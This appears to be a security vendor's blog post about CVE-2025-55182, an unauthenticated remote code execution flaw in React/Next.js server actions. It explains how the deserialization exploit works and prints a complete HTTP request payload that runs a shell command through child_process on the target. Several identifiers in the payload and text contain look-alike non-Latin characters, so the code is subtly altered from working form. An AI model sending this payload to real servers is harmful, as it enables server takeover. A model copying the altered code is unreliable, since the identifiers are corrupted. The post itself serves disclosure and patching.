Hacker maple3142 published a working Proof of Concept for CVE-2025-55182 which we successfully verified
This research on CVE-2025-55182 is published by the OX research team on Dec 5, 2025,
TL:DR
Just two days after we published our initial analysis of the React / Next.js server-side RCE vulnerability (CVE-2025-55182), a fully functional exploit has been released publicly. The PoC works exactly as expected and results in unauthenticated remote code execution on vulnerable servers.
Reminder: On Wednesday, Dec 3, a critical vulnerability was discovered in React, allowing attackers to execute code on vulnerable servers without any authentication, potentially exposing millions of applications to immediate risk. React is one of the most popular JavaScript libraries for building user interfaces, created by Facebook (Meta), with over 1.97 billion total downloads.
A working proof of concept (PoC) for exploiting CVE-2025-55182 on Next.js 16.0.6
The exploit abuses React’s $@ deserialization to forge a Chunk object and force execution of internal resolution logic on attacker-controlled data.
By hijacking Blob deserialization so that response._formData.get points to the Function constructor, attacker-supplied code is returned and executed, resulting in full remote code execution on the server.
This payload abuses React’s $@ deserialization to forge a resolved internal Chunk by combining “then”: $1:__proto__:then” with “status”:”resolved_model”, forcing React to invoke a then handler supplied by the attacker. The _response object is fully controlled: _formData.get is redirected to the Function constructor via “$1:constructor:constructor”, while _prefix holds the attacker’s JavaScript code (process.mainModule.require(‘child_process’).execSynс(‘calс’)). When React reaches the Blob deserialization path, it evaluates response._formData.get(response._prefix), which becomes Function(attacker_code) and returns a new function. That returned function is then executed through the manipulated then resolution flow, resulting in server-side remote code execution.
Credit to maple3142 for the great work.
Link to original work: https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
PoC:
POST / HTTP/1.1
Host: e57c9a8b480c.ngrok-free.app
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 458
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSynс('calc');","_formDatа":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
What Can You Do?
We were able to find a POC online and weaponize it in just two days from the initial CVE publication, this shows that this vulnerability is not just theoretical but actually highly risky, and should be patched immediately on your internet facing services.
For more details about the origin of the vulnerability, and how to protect yourself, you can refer to our original blog.
Worried your environment was exposed by CVE-2025-55182 or CVE-2025-66478?
Contact us to validate your exposure and understand the impact.
)
